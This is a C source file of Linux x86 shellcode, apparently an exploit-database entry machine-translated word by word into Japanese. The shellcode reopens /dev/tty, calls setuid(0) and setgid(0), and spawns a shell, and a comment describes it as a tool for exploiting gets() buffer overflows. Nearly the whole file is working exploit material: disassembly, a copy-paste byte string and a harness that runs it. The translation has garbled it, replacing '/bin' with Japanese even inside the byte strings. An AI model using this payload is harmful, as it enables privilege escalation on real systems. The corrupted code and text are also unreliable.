|
このページはEtoJ逐語翻訳フィルタによって翻訳生成されました。 |
/*
* setuid + setgid + stdin re-open shellcode for linux/x86 (71 bytes)
*
* Author: Andres C. Rodriguez (acamro) <acamro gmail com>
*
* Based on:
* Marco Ivaldi's 概念 (stdin re-open shellcode for Linux/x86)
*
* 地元の shellcode for stdin re-open and /貯蔵所/sh exec. It の近くにs stdin
* descriptor and re-opens /dev/tty, then 始める,決めるs setuid and setgid
* (elevation) and finally it does an execve() of /貯蔵所/sh.
* Useful to 偉業/利用する some gets() 衝撃を和らげるもの 洪水s in an elegant way...
*
*/
/* 83 c4 18 追加する $0x18,%esp
*
* の近くに(0)
*
* 31 c0 xor %eax,%eax
* 31 db xor %ebx,%ebx
* b0 06 mov $0x6,%al
* cd 80 int $0x80
*
* open("/dev/tty", O_RDWR | ...)
*
* 53 押し進める %ebx
* 68 2f 74 74 79 押し進める $0x7974742f
* 68 2f 64 65 76 押し進める $0x7665642f
* 89 e3 mov %esp,%ebx
* 31 c9 xor %ecx,%ecx
* 66 b9 12 27 mov $0x2712,%cx
* b0 05 mov $0x5,%al
* cd 80 int $0x80
*
* setuid(0)
*
* 6a 17 押し進める $0x17
* 58 pop %eax
* 31 db xor %ebx, %ebx
* cd 80 int $0x80
*
* setgid(0)
*
* 6a 2e 押し進める $0x2e
* 58 pop %eax
* 53 押し進める %ebx
* cd 80 int $0x80
*
* execve("/貯蔵所/sh", ["/貯蔵所/sh"], NULL)
*
* 31 c0 xor %eax,%eax
* 50 押し進める %eax
* 68 2f 2f 73 68 押し進める $0x68732f2f
* 68 2f 62 69 6e 押し進める $0x6e69622f
* 89 e3 mov %esp,%ebx
* 50 押し進める %eax
* 53 押し進める %ebx
* 89 e1 mov %esp,%ecx
* 99 cltd
* b0 0b mov $0xb,%al
* cd 80 int $0x80
*/
// 十分な copy-paste:
// "\x83\xc4\x18\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x2e\x58\x53\xcd\x80\x31\xc0\x50\x68//sh\x68/貯蔵所\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
// (71 bytes)
char sc[] =
"\x83\xc4\x18"
"\x31\xc0\x31\xdb\xb0\x06\xcd\x80"
"\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80"
"\x6a\x17\x58\x31\xdb\xcd\x80"
"\x6a\x2e\x58\x53\xcd\x80"
"\x31\xc0\x50\x68//sh\x68/貯蔵所\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
main()
{
int (*f)() = (int (*)())sc; f();
}